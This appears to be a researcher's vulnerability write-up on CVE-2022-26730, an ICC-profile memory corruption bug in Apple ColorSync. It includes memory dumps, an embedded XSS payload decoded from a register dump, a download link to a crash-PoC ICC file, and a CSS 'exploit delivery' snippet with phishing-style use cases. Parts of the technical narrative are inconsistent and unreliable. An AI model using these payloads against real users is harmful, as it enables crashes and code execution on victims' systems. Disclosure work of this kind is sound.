Executive Summary
CVE-2022-26730 | ColorSync | A memory corruption issue existed in the processing of ICC profiles. This issue was addressed with improved input validation. This issue is fixed in macOS Ventura 13. Processing a maliciously crafted image may lead to arbitrary code execution.
Software Updates are available for Mac models: Mac Studio (2022), Mac Pro (2019 and later), MacBook Air (2018 and later), MacBook Pro (2017 and later), Mac mini (2018 and later), iMac (2017 and later), MacBook (2017), and iMac Pro (2017).
CVE-2022-26730
A memory corruption issue existed in the processing of ICC profiles
https://support.apple.com/en-us/HT213488
NIST CVSS 3.1 Severity and Metrics: 8.8 High
Prior Art
Google Project Zero identified out-of-bounds reads caused by integer overflows in curve table initialization, documented as P0-2226. That vulnerability was assigned the Common Vulnerabilities and Exposures (CVE) identifier CVE-2021-30942.
The issue described in this report was found in the CMMLutTag::InitializeCurveTable method, as called by CMMLutTag::CMMLutTag during the initialization of A2B0/B2A0 tags of type mAB/mBA. The curve table consists of a number of curves of type ‘para’ (parametricCurveType) or ‘curv’ (curveType). The latter is represented in the color profile with the following structures (copied from https://www.color.org/icProfileHeader.h):
https://bugs.chromium.org/p/project-zero/issues/detail?id=2226
CVE-2022-26730 | ColorSync
TL;DR
CVE-2022-26730 | ColorSync | Found via PoC Replay of P0-2226 and disassembly of Patch for CVE-2021-30942
CVSS 3.1 Base Score: 8.8
AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
Targets
- (1) ColorSync, Safari, Finder, Instruments and other Applications using ICC Profiles or Graphics Files with ICC Profiles on macOS 12
- (2) Apple Developer Instruments, which contained memory bugs that were fixed in macOS 13.
- Result of Feedback Reports: 21E258 | 13E113 | Instruments | Crash | .icc | ColorSync | PoC | OE089308559899 | FB9970176 | FB9970191 | FB9971897
Bugs
Buffer Overflow
The ucr_string buffer is only 100 bytes, yet the number of bytes to copy into it is computed with strlen on the input string, so a string longer than 100 bytes overflows the buffer. An attacker can exploit this to crash the application or execute arbitrary code.
Memory Leak
The ucrBgWrite variable is allocated dynamically using malloc, yet it is not being freed. If this code is called repeatedly, it could lead to memory exhaustion and potentially cause the system to crash.
Data Corruption
The memcpy call that copies ucr_string into memory does not check the length of the data being copied. When string_bytes exceeds the space available at the destination, the consequences include data corruption, a memory access violation, or a segmentation fault.
Integer Overflow
The ucr_nbytes and bg_nbytes variables are computed by multiplying the number of elements in the curve by the size of each element. If the element count is large enough, the multiplication wraps, the resulting size is too small, and subsequent use of that size triggers unexpected behavior.
Type Casting
The ucrCurve and bgCurve variables are being cast to icUcrBgCurve type, which assumes that the memory block contains a valid structure of that type. If the memory block is corrupted or does not contain a valid structure of that type, it could result in undefined behavior, including program crashes or memory access violations.
ICC Profile | ColorSync::CMMLutTag::InitializeCurveTable
The ColorSync code path behind CVE-2022-26730 makes use of several Objective-C methods (SetPlotColor:, SetPlotNone, SetPlotPara:Type:, and SetPlotData:entryCount:entrySize:) whose control flow checks the values of several registers and branches to different parts of the code based on those values, which derive from user-controllable input.
CVE-2022-26730
The Multi-localized Strings Code provided attack surface via buffer overflow as shown below:

ColorSync Vulnerability Analysis
The crash occurred in the ColorSync Utility application on macOS 12.3 on March 29, 2022, while the application was running on an ARM-64 CPU.
ColorSync Utility crashed with a segmentation fault while executing the inputPopHit method of an NSPopUpButton control. The crash log also includes a Kernel Triage section with several "VM - pmap_enter failed with resource shortage" messages.
Vulnerable Code Highlights | CMMLutTag::InitializeCurveTable
CMMLutTag::InitializeCurveTable(CMMLutTag::CMMCurveTable&, CMMMemMgr&, unsigned int, unsigned int, CMMTagDataAccess*, unsigned int*) (in ColorSync)
X86_64 Disassembly of ColorSync::CMMLutTag::InitializeCurveTable
Shown below is the proof of concept (PoC) for CVE-2022-26730 | ColorSync as it is traced into the ColorSync::CMMLutTag::InitializeCurveTable function. That function is responsible for setting plot-related properties, such as color and type, based on its input parameters.
ColorSync::CMMLutTag::InitializeCurveTable begins by saving the stack base pointer and then pushing the values of several registers onto the stack. It then allocates stack space and initializes some local variables. The function then calls two other functions (SetPlotColor: and SetPlotNone) with input parameters rdi and rsi and stores the results in rsi and r14 on X86_64, respectively.
The arguments to SetPlotData:entryCount:entrySize:, SetPlotColor: and the other setters reached from ColorSync::CMMLutTag::InitializeCurveTable are user-controllable inputs taken from the curv parameters. Without proper input validation or sanitization, an attacker controls the value of the %eax register on X86_64 or the s20 and s21 registers on arm64e. By providing a crafted input, an attacker can cause a crash or potentially execute arbitrary code with the privileges of the ColorSync Utility process.
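The Bugs section above lists a fixed 100-byte ucr_string, a strlen-driven memcpy, an unfreed malloc and an unchecked count * sizeof(element) product for ucr_nbytes and bg_nbytes; the same count-times-size check is what curve table initialization has to get right. As an added example (not ColorSync's, Apple's or the ICC sample code), here is a bounds-checked reader for a ucrBg tag body using the icUcrBgCurve layout from icProfileHeader.h; every name other than those struct fields is an assumption.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>

/* Added example, not ColorSync's or the ICC sample code. Layout per
 * icProfileHeader.h: icUcrBgCurve ucr { count; uint16 curve[count] },
 * icUcrBgCurve bg { count; uint16 curve[count] }, NUL-terminated string.
 * No fixed 100-byte buffer, no strlen, no unchecked count * size. */

typedef struct {
    size_t   ucr_off, bg_off;          /* offset of each curve's data   */
    uint32_t ucr_count, bg_count;      /* validated element counts      */
    size_t   string_off, string_bytes; /* string_bytes excludes the NUL */
} UcrBgView;

static uint32_t rd32be(const uint8_t *p) {         /* ICC is big-endian */
    return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) |
           ((uint32_t)p[2] << 8)  |  (uint32_t)p[3];
}

/* Validate one curve at *off and advance past it; 1 if it fits, else 0. */
static int read_curve(const uint8_t *buf, size_t len, size_t *off,
                      size_t *data_off, uint32_t *count) {
    if (len - *off < 4) return 0;                 /* no room for count  */
    uint32_t n = rd32be(buf + *off);
    size_t remaining = len - (*off + 4);
    /* Divide the remaining space instead of multiplying n: the product
     * cannot wrap, and the curve data is guaranteed to be in bounds.  */
    if ((size_t)n > remaining / sizeof(uint16_t)) return 0;
    *count = n;
    *data_off = *off + 4;
    *off = *data_off + (size_t)n * sizeof(uint16_t);
    return 1;
}

/* Fill *v from a tag body; returns 1 on success, 0 if malformed. The
 * caller owns v, so nothing is malloc'd and nothing can leak.         */
int parse_ucrbg(const uint8_t *buf, size_t len, UcrBgView *v) {
    size_t off = 0;
    if (!buf || !v) return 0;
    if (!read_curve(buf, len, &off, &v->ucr_off, &v->ucr_count)) return 0;
    if (!read_curve(buf, len, &off, &v->bg_off, &v->bg_count)) return 0;
    /* Bounded scan for the terminator instead of strlen() on raw input. */
    const uint8_t *nul = memchr(buf + off, '\0', len - off);
    if (!nul) return 0;
    v->string_off = off;
    v->string_bytes = (size_t)(nul - (buf + off));
    return 1;
}
```

A reader that needs the curve values converts them from big-endian at ucr_off and bg_off using the validated counts, and copies the string with string_bytes rather than a fixed size.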
arm64e s20 Register
0x6f004300 : o C
0x79007000 : y p
0x69007200 : i r
0x68006700 : h g
0x20007400 : t
0x30003200 : 0 2
0x32003200 : 2 2
0x44002000 : D
0x76006100 : v a
0x64006900 : d i
0x48002000 : H
0x79006f00 : y o
0x20007400 : t
0x70002200 : p "
0x69007200 : i r
0x74006e00 : t n
0x68002000 : h
0x6c006500 : l e
0x6f006c00 : o l
0x77002000 : w
0x72006f00 : r o
0x64006c00 : d l
0x20002200 : "
0x73003c00 : s <
0x72006300 : r c
0x70006900 : p i
0x3e007400 : > t
0x6c006100 : l a
0x72006500 : r e
0x28007400 : ( t
0x36003600 : 6 6
0x29003600 : ) 6
0x2f003c00 : / <
0x63007300 : c s
0x69007200 : i r
0x74007000 : t p
0x22003e00 : " >
Buffer Overflow
The memory contents at this buffer address are repetitive, with the same value (0x61006100) repeated multiple times. This value corresponds to the UTF-16 encoding of the character “a” twice:
(lldb) x/500
0x1c5c881cc: 0x61006100 0x61006100 0x61006100 0x61006100
0x1c5c881dc: 0x61006100 0x61006100 0x61006100 0x61006100
0x1c5c881ec: 0x61006100 0x61006100 0x61006100 0x61006100
0x1c5c881fc: 0x61006100 0x61006100 0x61006100 0x61006100
0x1c5c8820c: 0x61006100 0x61006100 0x61006100 0x61006100
0x1c5c8821c: 0x61006100 0x61006100 0x61006100 0x61006100
0x1c5c8822c: 0x61006100 0x61006100 0x61006100 0x61006100
0x1c5c8823c: 0x61006100 0x61006100 0x61006100 0x61006100
0x1c5c8824c: 0x61006100 0x61006100 0x61006100 0x61006100
0x1c5c8825c: 0x61006100 0x61006100 0x61006100 0x61006100
0x1c5c8826c: 0x61006100 0x61006100 0x61006100 0x61006100
0x1c5c8827c: 0x61006100 0x61006100 0x61006100 0x61006100
0x1c5c8828c: 0x61006100 0x61006100
X86_64 Registers

Sample Profile
Graphical View of a PoC ICC Color Profile for CVE-2022-26730 | ColorSync showing the curveParameters using ColorSync:

CVE-2022-26730 | ColorSync | PoC
Attack Styles
WateringHole, SpearPhishing, EmailBomb, Cross Site Scripting, Other
The public domain CVE-2022-26730 | ColorSync PoC released today is a hand-rolled ICC profile that crashes ColorSync on macOS 12 with a null-byte read in the curv parameters. URL: https://xss.cx/2022/11/05/icc/Crash-CoreFoundation-CFDataGetLength-ColorSync-Crash-PoC-hand-crafted-to-hit-null-page-0x00-public-domain.icc.zip
ICC Profile Fuzzing Container
// Example | Sample
<rdf:Description rdf:about='cve-2022-26730-arbitrary-code-execution-user-controllable-input.png'
...
<System:FileName>cve-2022-26730-arbitrary-code-execution-curv-input-parameters-unsanitized.png</System:FileName>
...
<File:FileType>PNG</File:FileType>
<File:FileTypeExtension>png</File:FileTypeExtension>
<File:MIMEType>image/png</File:MIMEType>
...
<PNG:RedX>0.64</PNG:RedX>
<PNG:RedY>0.33</PNG:RedY>
<PNG:GreenX>0.3</PNG:GreenX>
<PNG:GreenY>0.6</PNG:GreenY>
<PNG:BlueX>0.15</PNG:BlueX>
<PNG:BlueY>0.06</PNG:BlueY>
...
<PNG:Icccopyright>Copyright 2022 David Hoyt LLC</PNG:Icccopyright>
<PNG:Iccdescription>e-sRGB</PNG:Iccdescription>
<ICC-header:ProfileCMMType>Hoyt</ICC-header:ProfileCMMType>
<ICC-header:ProfileVersion>6.6.6</ICC-header:ProfileVersion>
...
<ICC_Profile2:AToB0 rdf:datatype='http://www.w3.org/2001/XMLSchema#base64Binary'>
</ICC_Profile2:AToB0>
<ICC_Profile2:AToB2 rdf:datatype='http://www.w3.org/2001/XMLSchema#base64Binary'>
</ICC_Profile2:AToB2>
<ICC_Profile2:AToB1 rdf:datatype='http://www.w3.org/2001/XMLSchema#base64Binary'>
</ICC_Profile2:AToB1>
<ICC_Profile2:BToA0 rdf:datatype='http://www.w3.org/2001/XMLSchema#base64Binary'>
</ICC_Profile2:BToA0>
<ICC_Profile2:BToA2 rdf:datatype='http://www.w3.org/2001/XMLSchema#base64Binary'>
</ICC_Profile2:BToA2>
<ICC_Profile2:BToA1 rdf:datatype='http://www.w3.org/2001/XMLSchema#base64Binary'>
</ICC_Profile2:BToA1>
...
Use Case
Case #1: Attacker hand-rolls an ICC Color Profile named bad.icc, embeds it in sample.png, and distributes the image in a campaign.
Case #2: Attacker crafts an HTML file that references the malicious ICC profile or image and distributes it in a campaign.
HTML Exploit Delivery Container
@media color-gamut: p2{
@color-profile{ name: p3; src: url(hxxps://xss.cx/..path.part../icc/cve-2022-26730-arbitrary-code-execution-user-controllable-input-poc-1.icc); }
HTML Exploit Delivery PoC
Crash Reports
Timeline
- Keywords: CVE-2022-26730 | ColorSync | ICC Color Profile, User Controllable Input, Input Validation, Mac, PoC
- Operating System: macOS 12
- Vendor Notification: March 2022
- Vendor Resolution: October 2022
- Vendor Fix: This issue was addressed with improved input validation by Apple
- Vendor Source: https://support.apple.com/en-us/HT213488
- Published: 10/31/2022
- (Data Abort) byte read Translation fault
- Bug Type == Incomplete Fix
Knowledgebase
https://bugs.chromium.org/p/project-zero/issues/detail?id=2226
Issue 2226: Apple ColorSync: out-of-bounds reads due to integer overflows in curve table initialization
https://bugs.chromium.org/p/project-zero/issues/detail?id=2225
Issue 2225: Apple ColorSync: use of uninitialized memory in CMMNDimLinear::Interpolate
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-26730
https://nvd.nist.gov/vuln/detail/CVE-2022-26730